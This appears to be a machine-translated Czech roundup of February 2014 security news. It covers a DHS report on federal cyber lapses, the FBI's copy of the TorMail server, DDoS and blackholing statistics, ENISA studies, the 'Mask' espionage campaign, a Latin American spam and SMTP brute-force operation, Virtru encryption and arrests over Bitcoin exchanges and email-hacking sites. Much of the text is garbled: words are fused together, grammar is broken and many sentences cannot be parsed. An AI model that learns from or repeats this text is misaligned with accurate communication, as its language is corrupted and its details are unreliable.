Slabá hesla a zřídka aktualizuje software jevracející se téma se za 48.000 kybernetických incidentů hlášených k ministerstvu pro vnitřní bezpečnost - včetně krádeže údajů o národních nejslabších přehrad ze strany " škodlivého vetřelce " , apřípad, kdy hackeři vysílání škodlivého varování o zombie útoku přes několik amerických televizních stanic ,zpráva DHS našel .
" Údaje o národních nejslabších přehrad , včetně těch, které by mohly zabít Američany , pokud se jim nepodařilo , byly ukradeny škodlivého vetřelce , "Zpráva s názvem spolkové vlády Track Záznam o kybernetické bezpečnosti a kritické infrastruktury " řekl , " důvěrné kybernetické plány jaderných elektráren " byly ponechány bez ochrany . Plány pro technologii podpírající na New York Stock Exchange byly vystaveny na hackery . "
Zpráva byla sestavena na základě informací z více než 40 předchozích šetřeních podle generálních inspektorů , podle zprávy Mashable je . Mashable popsal slabá hesla jako opakující se téma zprávy o 17 - stránku , a řekl, že " heslo " zůstáváobyčejná volba pro státní zaměstnance .
Zpráva poukázala na řadu porušení , včetně hlášených útoku na národní nouzového vysílacího systému , který vedl televizních stanic v Michiganu , Montana a Severní Dakota vysílat falešné varování zombie útoku . " Civilní úřady ve vašem okolí , uvádělo, že těla mrtvých stoupá z jejich hrobů a útočí na živobytí . Nepokoušejte se přiblížit nebo zatknout tyto orgány, které jsou považovány za velmi nebezpečné . "
Zpráva byla tupá o tom, kdo na vině : " skutečné poklesky " vládní zaměstnanci , včetně softwaru se řídí fyzický přístup k zabezpečení webů , které bylo několik let zastaralé , a " slabých nebo výchozí" hesel střežit servery , které obsahují citlivé informace . Zpráva citoval instanci 10 hesel napsaných dolů a vlevo na stoly v kanceláři Chief Information Officer pro US Immigration a Customs Enforcement .
Webové stránky včetně vlastní pro - bezpečnostní stránkách DHS " budovat bezpečnost v ' - postavený na podporu vývojářům , aby " " se budovat bezpečnost na software v každé fázi svého vývoje " - obsahovala také známé zranitelnosti , píše se ve zprávě . Republikánský senátor Tom Coburn , který předsedá výboru , řekl Washington Post : "Oni nejsou ani dělat jednoduché věci . "
Na jaderné regulační komise , "obecný nedostatek důvěry " vedla zaměstnance k nákupu a nasazení počítačových sítí bez znalosti vlastního IT personálu . Zpráva ZDNet je popsáno vládní weby a systémy jako " zralé slabin " .
Zpráva říká, že mnoho útoky bylyvýsledkem špatně aktualizovaný software , včetně software AV .
" Zatímco kybernetické útoky do chráněných systémů jsou obvyklevýsledkem sofistikovaného hackerství , které často využívají světské slabosti , zvláště out-of -date software , " píše se ve zprávě . " I přesto, že zvuk nudné , není-li nainstalovat softwarové záplaty nebo aktualizovat programy na jejich nejnovější verze vytvořit vstupní body pro špiony , hackery a dalšími škodlivými činiteli . Loni v červenci , hackeři používají právě tento druh znám, fixačního slabosti ukrást osobní informace o více než 100.000 lidí z ministerstva energetiky . Oddělení je generální inspektor obvinil krádež částečně na pieceofsoftware který nebyl aktualizován v průběhu dvou let , a to i přesto, že oddělení koupil upgrade . "
" Nedostatky ve federální vládě vlastní kybernetické bezpečnosti jsou ohroženy elektrickou síť , naše finanční trhy , naše systémy havarijního a osobní informace našich občanů , " řekl senátor Coburn v tiskové zprávě . " Zatímco politici chtěli navrhnout komplexní nové předpisy , masivní nové programy , a miliardy v novém výdajů na zlepšení kybernetické bezpečnosti , existuje velmi jednoduchý - a kriticky důležité - opatření, která by mohla chránit naši infrastrukturu a osobní údaje našich občanů , že jsme prostě nejsou dělá . "
Kdo by měl být odpovědný za ochranu vašeho soukromí online?
5.2.2014 Ochrana
Právě včas pro ochranu soukromých dat den, společnost Microsoft vydala výsledky průzkumu, který ukazuje postoje o ochraně osobních údajů technologických zdatné jednotlivce ve Spojených státech a čtyřech evropských zemích (Belgie, Francie, Německo a Velká Británie). Výzkum zjistil , že pro většinu část lidí má pocit, že mají omezenou kontrolu nad tím, jak se používá jejich dat on-line (53 procent času v USA a 43 procent času v Evropě) a mají zájem o pochopení toho, jak se jejich informace jsou použity. Tento infographic užitečně shrnuje výsledky.
Federálové klonovaný TorMail server s budoucí vyšetřování v mysli
5.2.2014 Bezpečnost
Uživatelé TorMail zapojená do nezákonné činnosti by se cítil víc než výčitky úzkosti, když bylo potvrzeno, loni v létě, že FBI převzala kontrolu svobody Hosting serverů. V každém případě, nedávno zveřejnil soud podání bude pravděpodobně dělat je velmi bojí. Freedom Hosting byl známý pro umožnění webové stránky zaměřené na dětskou pornografii musí být umístěn na svých serverech, ale také pro hostování právní služby, jako je TorMail, které sice mohou být použity pro účely páchání trestné činnosti . nově odhalené detaily o zabavení ukázaly, že několik týdnů před Freedom Hosting byla pořízena dolů, FBI přístup k serveru TorMail a udělal kopii. To je to, co nakonec jim umožnily objevit v reálném světě totožnost hlavní Provozovatel on-line padělaných karet e-shopu vypnout minulý týden. Muž, jeden Sean Roberts z Floridy, který se používá účet TorMail ( platplus@tormail.com ) jako záložní účet pro zpracování objednávek. "Mezi 22.července 2013 a 2.8.2013, v souvislosti s nepříbuzným trestního vyšetřování, FBI získat kopii počítačového serveru umístěném ve Francii prostřednictvím vzájemné právní požadavek Smlouvy o pomoc do Francie, která obsahovala údaje a informace z e-mailového serveru Tormail, včetně obsahu Tormail e-mailových účtů, "vysvětlil US Postal inspektor Eric Malecki v stížnost. "On nebo asi 24 září 2013, činných v trestním řízení získat povolení k domovní prohlídce pro vyhledávání obsahu Platplus Tormail účet, který pobýval na zabavené Tormail serveru." Co to znamená, že tato zatčení jsou pravděpodobně jen začátek, jak že lze důvodně očekávat, že FBI bude kroužit zpět na klonované serveru, kdykoli se setkají účet TorMail při vyšetřování trestné činnosti. "taktika naznačuje FBI se přizpůsobuje věku big dat s NSA-stylu shromažďujeme-vše approach, shromažďování informací do virtuálního skříňce zámku, a zanechává ji tam, dokud se může získat určenému orgánu, aby na ni klepněte později, " poznamenal Wired Kevin Poulsen, s tím, že není důvod se domnívat, že FBI hledal server pro důkazu před získáním povolení k prohlídce . "Ale teď, že má kopii serverů TorMail je, úřad může provádět nekonečné domovní prohlídce na poštovní služby, které kdysi chlubil , že jsou imunní vůči špehování, ".
Blackholing efekt snižuje riziko kybernetický útok na regulovaném dat
5.2.2014 Počítačový útok
FireHost oznámila, trendy útoků je blokován z webových aplikací svých klientů ve 4. čtvrtletí 2013. Bezpečnostní experti si všimli, že nejnovější údaje Troj společnosti na pokus o kybernetických útoků by mohla poskytnout důkaz o "blackholing" efektu. Ve skutečnosti, blackholing efekt přispěl k celkovému počtu útoků filtrovat podle FireHost pádu z více než 17 m ve 3. čtvrtletí 2013 na méně než 9 m ve 4. čtvrtletí 2013.
"Pro každého, kdo se kybernetické bezpečnosti a detekce hrozeb nový, musí blackholing jev znít neuvěřitelně abstraktní," přiznává FireHost CEO Chris Drake. "Naštěstí, je to vlastně docela jednoduché a naše nejnovější statistiky jistě kvantifikovat pozitivní přínosy tento účinek má, pokud jde o ochranu regulovaných údajů." Jak blackholing účinek se projevuje ve virtualizované infrastruktuře se komplexních bezpečnostních vrstev, většina škodlivého provozu vidět a blokován pochází z zlovolných sítí a botnety. IP pověst filtr zachytí webového provozu na obvodové vrstvy a rozpozná, kdy rádoby útočník byl černý ho. To znamená, že, když zločinci spuštění webových útoků nebo provádět průzkum na velké kusy internetu od známých "špatných" IP adres, filtr IP pověst může zabránit jim v připojení k chráněné síti prostoru bez důvodu nebo reakci. Postupem času, černá díra je chráněná IP neviditelné útočníků. Jako výsledek, tyto webové aplikace jsou vystaveni méně a méně útoku provozu, zlepšení efektivity paměti a procesoru, stejně jako snížení dopravního zatížení sítě, abychom jmenovali alespoň některé výhody. Ze stejného důvodu, objem spamu a všeho ostatního associated s nelegitimních zdrojů také sníží. "V oblasti konfliktu, nepřátelé nemají střílet na stromy na off-šance, že je neuvěřitelně dobře maskované jednotky pěchoty okolí," vysvětlil výkonný ředitel společnosti FireHost , Chris Drake. "To je více či méně princip černé díry efektu. Pokud je automatizovaný útok zjistí mrtvého adresy, je pravděpodobné, že ji dále zkoumat. To se jednoduše přesunout na jiný, nový zranitelné cíle, a spustit stejný útok tam. " Hackeři přednost osvědčené Podle Chrise Hinkley, vedoucí bezpečnostní inženýr v FireHost, na skutečnost, že údaje za 4. čtvrtletí a 3. čtvrtletí 2013 byl tak Podobný vlastně říká hodně o současné kybernetické krajiny. A sice, že útočníci jsou v současné době méně nakloněn, a méně motivováni k vývoji nových metod útoku, nebo přinejmenším nejsou vytvářet nové škodlivé nástroje ve velkém měřítku. "Útočníci se stále používá relativně staré metody útoku, a to je snadné pochopit, proč, tam je velmi málo odpor ze strany potenciálních obětí a bezpečnostního průmyslu se snaží držet krok. Zatímco nové nástroje a metody doručení jsou vytvořeny pravidelně, nedávné narušení bezpečnosti osobních údajů, jako jsou likes utrpěl SnapChat a Target nesou důkaz, že staré-hat je stále dost dobrý. Bezpečnostní opatření a protiopatření nejsou postupuje rychlým tempem dost přinutit útočníky být neuvěřitelně inovativní. Existuje ještě mnoho potenciálních obětí náchylné k útoku za použití stejných starých využije a nástroje. "Dokud informační útočníci se snaží řádně chráněna, a my jsme se vymanili z status quo, bude vetřelci držet jejich příznivých útoky a to i jimi."
DDoS útoky staly chytřejší, rychlejší a přísnější
5.2.2014 Počítačový útok
DDoS útoky budou i nadále vážným problémem v roce 2014 - jako útočníci stále více agilní a jejich nástroje staly sofistikovanější, podle Radware. Jejich zpráva byla zpracována s využitím údajů z více než 300 případů a výkonný průzkum sestávající z osobních rozhovorů s 15 vysoce postavených bezpečnostních manažerů.
V roce 2013, stále více rozšířené DDoS útoky vedly ke škodlivým výpadky služby a degradace služby, kriticky narážejícího příjmů, spokojenost zákazníků a vnímání značky. . Útočníci se staly rychlejší porazit nově nasazené nástroje snižování Avi Chesla, CTO ve společnosti Radware řekl: "Osmdesát sedm procent našich respondentů se setkal problémy na úrovni služby z těchto stylem útoků. . Negativní dopad výpadku služby je již znám, ale i malé případy degradace služby mohou mít škodlivé a trvalé dopady na image značky organizace, spokojenosti zákazníků a nakonec i jeho spodním řádku " Klíčové závěry z této zprávy jsou: zhoršování Service je dost k přerušení podnikání. Šedesát procent respondentů uvedlo, že zažili degradaci služby kvůli útokům v roce 2013. I když to nemusí zdát tak škodlivé jako úplné vypnutí, studie ukazují, že 57 procent z on-line spotřebitelé budou opustit místo po uplynutí tři sekundy na stránku načíst a 80 procent z těch lidí, se už nevrátí. Pro servisní organizace založené, může to mít za následek okamžitou ztrátu příjmů. útočníci (rychle) oplatit. Útočníci se stále přizpůsobuje a porážet nové obranné protokoly realizované organizací s využitím nových vektorů útoku. Použití HTTP povodní útoky a nástroje, jako je "Kill 'em All", útočníci se dramaticky zkracuje cyklus zmírnění - někdy až několika hodin po zdroji byly nasazeny. DoS / DDoS útoky nechat cestu ničení. Zatímco silné útoky došlo v roce 2011 a 2012, celková intenzita útoků a procento těchto útoků s vysokým rizikem se zvýšila během posledních několika let. DDoS útoky na závažnosti vzrostl o 20 procent v roce 2013, v souladu s DoS / DDoS posouzení rizik skóre RadWare je. průmysl "Hit List" se rozpíná. Odvětví finančních služeb se připojí vládní organizace jako odvětví s nejvyšším rizikem útoků. Riziko pro finanční služby se zvýšily v důsledku hacktivist skupin provedení DDoS útoky - jako pokračování operace Ababil a ty na několika burzách Bitcoin - nejen pro destruktivní účely, ale také zároveň maskovat jiné vniknutí vedoucí k podvodné činnosti. Rizika útoků na web hosting společnosti a poskytovatelé internetových služeb také zvýšil v roce 2013. Nové útoky, jeden nebezpečný obecnosti. Výsledky průzkumu ukázaly, že útoky DNS jsou nyní druhý nejčastější způsob útoku organizace bojují, za DoS / DDoS. Jedná se o atraktivní pro útočníky díky jejich schopnosti generovat masivní provoz s omezenými zdroji a vícevrstvé architektury, která umožňuje sledování útočníky téměř nemožné. Kromě útoků DNS, ostatní útoku, také ukázal se jako významné otázky pro organizace. Šifrované útoky aplikací na bázi tvoří 50 procent všech internetových útoků. Web aplikace přihlašovací stránky byly hit na denní bázi, pro 15 procent organizací. "Útoky v roce 2014, nejsou zpomaluje. Ve skutečnosti, organizace, je třeba přijmout opatření nyní připravit své sítě - zejména ve finančních a vládního sektoru, "dodal Chesla. "Výsledky této zprávy jsou výzva k akci, a nejlepší způsob, jak bojovat proti kybernetickým útokům je třeba připravit a zapojit podporu odborníků kybernetické bezpečnosti." RadWare je ERT doporučuje následující opatření v zájmu předvídání a zmírňování následků útoků:
Zrychlete čas zmírnění. Organizace musí zajistit, že dokáže detekovat útoky a nasadit řešení zmírnění v nejkratším možném čase.
Připravte si deku pokrytí. S multi-vektorové DoS / DDoS útoky stále častější, organizace musí investovat do širší pokrytí útoku, který dokáže detekovat a chránit proti útokům všech typů a velikostí.
Zřídit jediné kontaktní místo. S buď interní bezpečnostní tým zaměstnaný s odborníky DoS / DDoS nebo externí tým, havarijní, který vám pomůže vybrat správné možnosti zmírnění má zásadní význam pro organizace, které v případě útoku.
DDoS přehled tipy
E-mailová adresa
Světlomet
Policie ransomware: mnohamilionové podnikání
Publikováno dne 5. února 2014. | Zločinci používají skutečné vymáhání práva agentura loga půjčovat oprávnění k jejich zprávy a donutit oběti na zaplacení výkupného, aby odhalili jejich počítačů.
Denní strávit
Přihlášením do našeho ranního zpravodajského aktualizace, obdržíte denní výtah nejnovější bezpečnostní zprávy zveřejněné na Help Net Security.
Týdenní newsletter
s více než 500 otázek, tak daleko, čtení náš newsletter každé pondělí ráno vás udrží v up-to-data s bezpečnostní rizika tam.
Doporučené zdroje:
Zabezpečovací systémy detekce s Snort IDS: Pokročilé techniky Využití Snort, Apache, MySQL, PHP a kyselina
Chraňte svou síť pomocí Snort: vysoce výkonné, open source IDS. Snort dává správcům sítě otevřený systém detekce narušení zdroj, který překonává proprietární alternativy. >>
Open Space Security ™ Network Protection
Podívejte se, jak Kaspersky Lab nabízí novou flexibilitu pro zabezpečení sítě tím, že rozšíří mimo tradiční pracoviště pro ochranu stále distribuované pracovní síly. >>
Zlepšení důvěry v internetových služeb
5.2.2014 Bezpečnost
Agentura kybernetické bezpečnosti EU, ENISA, vydává řadu nových studií o současných bezpečnostních postupů poskytovatelů důvěryhodných služeb (TSPS) a doporučení pro zlepšení přeshraniční důvěryhodnost a interoperabilitu nových regulovaných TSPs a pro služby e-Government jejich použití . Secure vládní e-služby mají zásadní význam pro společnost, např. zdraví, zadávání veřejných zakázek, spravedlnosti. Bezpečnost je zásadní pro získání důvěry občanů EU o používání těchto služeb. Nicméně, existuje mnoho bezpečnostních problémů je třeba překonat, aby bylo zajištěno jejich úspěšné nasazení. Studie TSP zdůrazňuje, že:
Vzájemná pomoc systému mezi orgány dohledu v členských státech by měl být zřízen.
Aplikace na potřeby klienta, zajistit end-to-end šifrovanou komunikaci s TSPs a služeb elektronické veřejné správy v zájmu ochrany soukromí občanů EU.
Dokument e-Government používá několik Evropské komise financovaných rozsáhlých pilotních projektů, které integrují TSP (epSOS pro zdraví, e-CODEX pro spravedlnost a PEPPOL pro zadávání veřejných zakázek) jako případové studie. Tyto případy jsou použity k analýze stávající postupy a identifikovat mezery a kde lze provést změny k lepšímu. V této zprávě, problémy agentura podrobných technických bezpečnostních postupů, doporučení pro TSP a služeb e-governmentu jejich použití, včetně časové značky, e-dodávky, dlouhý . Doba uchovávání a ověřování e-podpis Hlavní doporučení určená nabídnout důvěryhodné e-Government služeb pro občany EU patří:
Podporovat důvěryhodné značky posuzovány s ohledem na požadavky eIDAS, že by být uznány za hranicemi.
Důvěra služby by měly být rozvíjeny v evropském měřítku, v souladu s EU i místní legislativou.
Zvláštní normy Business Continuity managementu by měla být přijata v poskytování důvěryhodných služeb (podle TSPs) a požadavků zákazníka e-Government. / Li>
Na kritičnosti e-governmentu základě, měly by vždy posoudit tři aspekty:
síla mechanismů ověřování, které mají být použity, podpoří využívání elektronického podpisu.
potřeba end-to-end šifrování a
potřeba revizních aby elektronické důkazy.
Pokyny pro poskytovatele důvěryhodných služeb poskytnout doporučení v oblasti právního a regulačního rámce TSPs, hodnocení rizik pro TSPs a zmírnění bezpečnostních incidentů. Hlavními body zvýrazněné zprávy patří:
právní úkony v rámci EU a na vnitrostátní úrovni
k dispozici normy platné věřit služby
procesy pro efektivní řízení rizik na TSPs
manipulace bezpečnostních incidentů v TSPs, jako zosobnění, ohrožení certifikačním úřadem, organizační selhání, atd.
Výkonný ředitel agentury ENISA, profesor Udo Helmbrecht, prohlásil: "Je nezbytné, aby podniky a vlády po celé Evropě, aby občané důvěřují své on-line služby, a proto realizovat nejlepší řešení technických e-podpis. Tyto osvědčené postupy musí být průběžně vyhodnocován prostřednictvím častého analýzy rizik, aby bylo možné udržet krok s technickým vývojem a překonání vyvíjející počítačové bezpečnostní výzvy. " Celé zprávy jsou k dispozici zde .
Pohled Behind "The Mask"
4.2.2014 Bezpečnost
Svět APTS je barevné místo. V roce 2012, jsme odhalili Flame, masivní cyberespionage operaci pronikající počítačů na Blízkém východě. Náš výzkum ukázal souvislost s dobře známým Stuxnet cyberweapon, navržen tak, aby sabotovat íránský jaderný program.
Na začátku roku 2013 jsme oznámili náš výzkum na RedOctober , a cyberespionage provozu se zaměřením na diplomatických institucí. V červnu 2013 jsme vydali náš výzkum na NetTraveler , a v září, náš výzkum na Kimsuky útoky.
Naše analýza všech těchto různých APT operace indikována jedinečnou používání jazyků, které nabízejí vodítko, pokud jde o některé z lidí za těchto operací. Pokud připomínky v plameni C & C byly psány v angličtině, artefakty v RedOctober uvedeno ruské reproduktory, NetTraveler uvedeno čínské domorodce. Konečně, Kimsuky uvedeno korejské mluvící autory, které jsme v souvislosti s KLDR.
Během posledních měsíců jsme byli zaneprázdněni analýzy ještě další sofistikované cyberespionage operace, která trvá již nejméně od roku 2007, infikovat obětí v 27 zemích. Z důvodů, které mají být vysvětleny později jsme tuto operaci "masky" považuje.
"Maska" je využití high-end využije, velmi sofistikovaný malware, který obsahuje bootkit a rootkit, Mac a Linux verze a vlastní útok produktů Kaspersky. To je jejich uvedení výše Duqu z hlediska propracovanosti, dělat to jeden z nejvyspělejších hrozeb v tuto chvíli.
Nejzajímavější, autoři se zdá být nativní ještě v jiném jazyce, který byl pozorován velmi vzácně v APT útoků.
Velký box LatAm hack (2. část - Email brute-force a spam)
4.2.2014 Spam | Bezpečnost
Pro doplnění již zmíněné závěry, server To samé cybercriminal obsahuje další zajímavé věci, ale před zmínku je, chci dát trochu více informací o e-mailové databáze, do spam obětí, aby jim infikovat s Betabot malware. E-mail databáze , jak velký je seznam e-mailových adres do spam obětí? Má 8689196 různé adresy. Je to velmi kompletní databáze. I když jen 10% strojů lidí v tomto seznamu nakazit, zločinci by získat více než 800 tisíc infikovaných počítačů! zeměpisné rozložení e-mailů je již publikován zde . Pokud se podíváme na čísla z nejzajímavějších oblastí, které patří do vlády, vzdělávací instituce a tak slouží k spam a nakazit, jsou stále velmi vysoká čísla:
Počet domén e-mailů
org 13772
edu 2015
gov 1575
plivanec 312
Spamování techniky
Většina spamu dnes poslal botnetů, ale to není to, co gang za tento server používá. V tomto případě, spamy jsou odesílány prostřednictvím aplikace s názvem " spam.exe " [cesta] / filename MD5 součet -------------------------- -------------------------------------------------- --- spam.exe dd77b464356a7c9de41377004dd1fa35 Když je spuštěn, budete požádáni o zadání hesla (viz níže) a pak potřebuje speciální parametr, který je prostý textový soubor.
Původní soubor parametrů je tento:
Přijímá parametry, jako je počet vláken , ze , předmět , tělo zprávy, souboru pro upevnění, Reply-To a smtp serveru, který chcete použít. Tam je řetězec uvnitř zkompilovaný kód směřující ke zdrojům projektu: j: \ hack \ dev \ spam \ spam \ obj \ Release \ spam.pdb Když byl tento server objevil, zločinci již příští Napsat připraven k odeslání jejich oběti:
Překlad ze španělštiny: "Uživatel, Z: 519825 **** přítel právě vám poslal zprávu MMS přes webové stránky Claro, zpráva bude automaticky odstraněna v 72 hodin. Stáhněte si zprávu nyní. ID:. CLARO, LA RED [Network], kde je všechno možné, "
Původní škodlivý URL vložené do zprávy je toto:
Jak jsem již zmínil, poslední parametr "spam.exe" škodlivý mailer je smtp serveru. Počítačoví zločinci se shromažďují 2093 různých nejsou správně zajištěné e-mailové servery po celém světě. To zahrnuje e-mailové servery z Číny, USA, Japonsku, Indonésii, Rusku, Itálii, Rumunsku, Nizozemsku, Německu, Bělorusku, Kazachstánu, Vietnamu, Hongkongu, Irsku, Brazílie, Řecka, Chile, Česká republika, Belgie, Filipín, Dánsku, Švédsku , Ukrajina, Maďarsko, Kanada, Malajsie, Polsko, Peru, Tchaj-wan, Francie, Jižní Korea, Španělsko a mnoho dalších.
Jak se zločinci získat tolik špatne serverů z celého světa? KISS To je název modulu použité k pokusu SMTP servery, pokud tito mají výchozí účty se stejnými výchozími hesly. Jinými slovy, jedná se o hrubou silou aplikace testovat SMTP spojení. [cesta] / filename MD5 součet ---------------------------- -------------------------------------------------- - kiss.exe 3a5d79a709781806f143d1880d657ba2 To je aplikace postavená uvnitř téhož projektu, řetězec z kódu to potvrzuje: J: \ hack \ dev \ brut \ obj \ x86 \ Release \ kiss.pdb Jakmile běží, budete požádáni o heslo , což je stejné jako v případě "spam.exe" aplikace. Přijímá čtyři parametry: nitě , IPS , loginy / hesla a e-mailové .
Když jsem zjistil, tyto zdroje, zločinci měli v IPS parametr souborů 1.519.403 IP adresy ve frontě na hrubou silou!
Zatímco seznam přihlášení / hesel měl následující kombinace:
Jedna zajímavá věc je, že zločinci nechtěl brute-force všechno a všechny domény tak, aby obsahoval seznam výjimek, které umožňuje " kiss.exe ", přeskočit a ne brute-force další domény:
Domény vyloučené z brute-nutit
Vypadá to, že prostě nechtěli přitahovat příliš pozornosti, především od vlád, zatímco brute-nutí. Už jsem najít další zajímavé věci na tomto serveru? Ano, a budu psát, že v příštím a posledním dílu seriálu Big Box Latam Hack. Kaspersky Anti-Virus detekuje "spam.exe" a "kiss.exe" jako E-mailové Flooder.MSIL.Agent.r a HackTool. MSIL.BruteForce.ba resp. Závěry Počítačoví zločinci z různých oblastí může pracovat v podobné, ale přesto různými způsoby. Tento případ je dobrým příkladem, jak to ukazuje, jak zločinci z Latinské Ameriky, bez přístupu k zombie strojů, snažil se najít co nejvíce slabých definované SMTP servery jsou možné po celém světě k distribuci spamu. Tato technika nesnížila jejich potenciální dosah, pokud jde o počet obětí, ani jejich geografické umístění. Někdy jednoduché "řešení" pracovat efektivně a my - jako výzkumní pracovníci -. Nemají pouze soustředit na botnet podobné činnosti Jak bylo uvedeno v předchozím příspěvku, tam je důkaz zločinci z Jižní Ameriky jsou v kontaktu s zločinci z východní Evropy a nejhorší část je, že používáte smíšené techniky:.
Bývalý zaměstnanec NSA pomáhá šifrovat e-maily
4.2.2014 Šifrování
Bývalý pracovník americké agentury NSA se spojil s dalšími vývojáři a představil nový software, který by měl e-maily šifrovat tak bezpečně, že se k nim nikdo nedostane.
E-mail, stále možná nejvíce využívaná aplikace na internetu, je bezpečný asi tak jako pohlednice. Na rozdíl od pohlednicí na něm jsou však závislé i velké firmy. Při vývoji e-mailu se na bezpečnost moc nehledělo – byl navržen prostě jen tak, aby fungoval. Po zveřejnění špionážních skandálů, kdy vyšlo najevo, že (nejen) americká NSA odposlouchává konverzaci snad všemi možnými způsoby, řada firem vidí v zabezpečení e-mailu byznys.
Jak tvrdí majitelé společností Wickr a Silent Circle, šifrovací software sice dostupný je, ale je příliš složitý. Tyto společnosti proto spojily své síly a vyvinuly open-source software s názvem Virtru, který by měl problémy okolo šifrování emailů vyřešit. „S Virtru můžete posílat komukoli cokoli a on se k tomu bude schopný dostat i bez toho, aby měli doktorát z IT,“ říká Will Ackerly z Virtru.
Velká výhoda Virtru je, že spolupracuje s Gmailem, Outlookem, Yahoo a ke svému fungování nevyžaduje externího klienta. Obsah v těle emailu je ihned zašifrován, takže Gmail, který automaticky ukládá návrhy nových zpráv, vidí pouze šifrovaný obsah. Odesílatel si jen musí nainstalovat rozšíření prohlížeče, které se stará o šifrování a dešifrování obsahu. Tento proces se odehrává na počítači/mobilním zařízení uživatele, takže poskytovatelé webmailů vidí jen šifrovaný obsah. Příjemce rozšíření instalovat nemusí a může si přečíst dešifrovaný obsah ve speciálním okně.
Tělo zprávy je šifrováno za pomoci Trusted Data Format (TDF), který Ackerly navrhl v roce 2008, když ještě sám pracoval pro NSA. Na rozdíl od jiných šifrovacích programů jako třeba PGP, umožňuje TDF šifrovat také přílohy. I když říci, že je něco šifrované, zní jednoduše, v celém procesu je třeba vyřešit řadu technických zádrhelů. Problém může nastat například tehdy, když soud firmě nakáže, aby odevzdala šifrovací klíč. To se stalo americké společnosti Lavabit, která poskytuje e-mailové služby také Edwardovi Snowdenovi. Virtru to řeší tak, že generuje nový klíč pro každý e-mail a po jeho odeslání je tento klíč zrušen.
Pokud by Virtru někdo přikázal SSL klíč zveřejnit, nebylo by to k ničemu platné, jelikož „nikdo by nebyl schopen konverzace dešifrovat.“ Základní funkce Virtru jako šifrování mailů nebo možnost kontrolovat jejich přeposílání budou bezplatné. Platit budou pouze firmy za korporátní licence. Pracuje se i na mobilních klientech pro Android a iOS.
Federálové zatčení Bitcoin Foundation místopředsedu a Bitcoin výměník
3.2.2014 Bezpečnost
Americké ministerstvo spravedlnosti oznámil zatčení a rozpečetění obvinění na Manhattanu federálního soudu proti Robert Faiella (také známý jako "BTCKing"), podzemní Bitcoin výměníku, a Charlie SHREM, generální ředitel a Compliance Officer Bitcoin Kurzy společnosti, pro zapojení do systému prodat více než 1 milion dolarů na Bitcoins pro uživatele "Silk Road".
SHREM byl zatčen v neděli na John F. Kennedy mezinárodní letiště v New Yorku. Faiella byl zatčen v pondělí v jeho rezidenci v Cape Coral na Floridě. Podle tvrzení obsažených v trestním stížnosti neuzavřených dnes na Manhattanu federálního soudu: Od Zhruba v prosinci 2011 do října 2013 Faiella běžel podzemní výměnu Bitcoin na internetových stránkách Silk Road, . webové stránky, které slouží jako rozlehlé a anonymní černý trh bazaru, kde byly koupeného a prodaného nelegální drogy prakticky každé odrůdy se pravidelně uživateli lokality Ovládání pod uživatelským jménem "BTCKing," prodal Faiella Bitcoins - jediná forma platby přijímány na Hedvábné stezce - pro uživatele, kteří chtějí koupit nelegální léky na místě. Po obdržení objednávky na Bitcoins od uživatele Silk Road, naplnil objednávky přes společnost se sídlem v New Yorku. Společnost byla navržena tak, aby zákazníci mohli vyměnit peníze na Bitcoins anonymně, to znamená, aniž by poskytovat žádné osobní identifikační údaje, a to účtován poplatek za své služby. Faiella získat Bitcoins s pomocí společnosti, a pak prodal Bitcoins pro uživatele Silk Road na značky. SHREM je generální ředitel společnosti, a asi od srpna 2011 až do asi července 2013, kdy společnost ukončila provoz, on byl také jeho Compliance Officer, odpovědný za dodržování společnosti s federální a druhé proti legalizaci výnosů z trestné činnosti ("praní peněz") zákony. SHREM je také místopředsedou Bitcoin Foundation, která se věnuje podpoře Bitcoin virtuální měnový systém. SHREM, který osobně koupil drogy na Hedvábné stezce, si byl plně vědom, že Silk Road je webová stránka s drogami, a přes jeho komunikace s Faiella , SHREM také věděl, že Faiella bylo provozování směnárenské služby Bitcoin pro uživatele Silk Road. Nicméně, SHREM vědomě usnadnit podnikání Faiella je se společností v zájmu zachování podnikání Faiella je jako lukrativní zdroj příjmů firmy. SHREM vědomě povoleno Faiella využít služeb společnosti koupit Bitcoins pro své zákazníky Silk Road, osobně zpracovaných Faiella rozkazy, dával slevy Faiella na jeho velkoobjemových transakcí, nedokázal podat jedinou podezřelou zprávu o činnosti s ministerstva financí Spojených států o Faiella ilegálního činnost, jako byl jinak povinen dělat v jeho roli jako společnosti Compliance Officer, a záměrně pomohl Faiella obejít omezení AML společnosti, i když to bylo SHREM je úkolem je prosazovat, a to i přesto, že společnost byla zaregistrována u ministerstva financí jako peníze služby pro obchodníky. Pracovní dohromady, SHREM a Faiella vyměnili přes 1 milion dolarů v hotovosti na Bitcoins ve prospěch uživatelů Silk Road, aby uživatelé mohli na oplátku, aby nelegální nákupy na Hedvábné stezce. Koncem roku 2012, kdy společnost zastavila přijímání plateb v hotovosti, Faiella přestal podnikat se společností a dočasně vypnout jeho ilegální výměny Bitcoin služby na Hedvábné stezce. Faiella obnovil provoz na Hedvábné stezce v dubnu 2013 bez pomoci společnosti, a pokračovaly ve výměně desítky tisíc dolarů týdně v Bitcoins do webové stránky Silk Road byl vypnut činnými v trestním řízení v říjnu 2013. Každý obžalovaný obviněn ze spiknutí s cílem spáchat praní špinavých peněz, a provozování nelicencované peníze vysílací podnikání. SHREM je také obviněn z vědomě nedaří podat jakékoli podezřelé zprávu o činnosti regarding protiprávní transakce Faiella prostřednictvím Společnosti v porušení zákona o bankovním tajemství.
Provozovatelé e-mailových hackerských webových stránek zatčeni v USA, Číně, Rumunsku
3.2.2014 Kriminalita
V rámci mezinárodní operace vymáhání práva zahrnující Rumunsko, Indie a Číny, USA federální prokurátoři obvinili dva operátory a Spojené státy se sídlem v e-hacking webových stránkách, stejně jako tři zákazníky z jiných webových stránkách hackerských se sídlem v jiných zemích, se počítačového podvodu trestné činy. Mark Anthony Townsend, 45, z Cedarville, Arkansas, a Joshua Alan Tábor, 29, z Prairie Grove, Arkansas, údajně provozoval e-mail hacking webové stránky needapassword.com . Podle soudních dokumentů, zákazníci na webových stránkách provozovaných Townsend a Tábor za předpokladu, názvy e-mailových účtů, a Townsend a Tábor by získat hesla na těchto účtech. Zákazníci z platby na PayPal účty a téměř 6000 e-mailových účtů byly ovlivněny systému. Ostatní tři obžalovaní zpoplatněny tento týden každý čelí přestupků na pronájem počítačových hackerů. Tito zákazníci, kteří čelí až na jeden rok ve federálním vězení, jsou:
John Ross Jesenský, 30, Northridge, Kalifornie, kdo zaplatil 21.675 dolar na čínské webové stránky dostat e-mailového účtu hesla
Laith Nona, 31, Troy, Michigan, který zaplatil přibližně 1081 dolar, aby se e-mailového účtu hesla
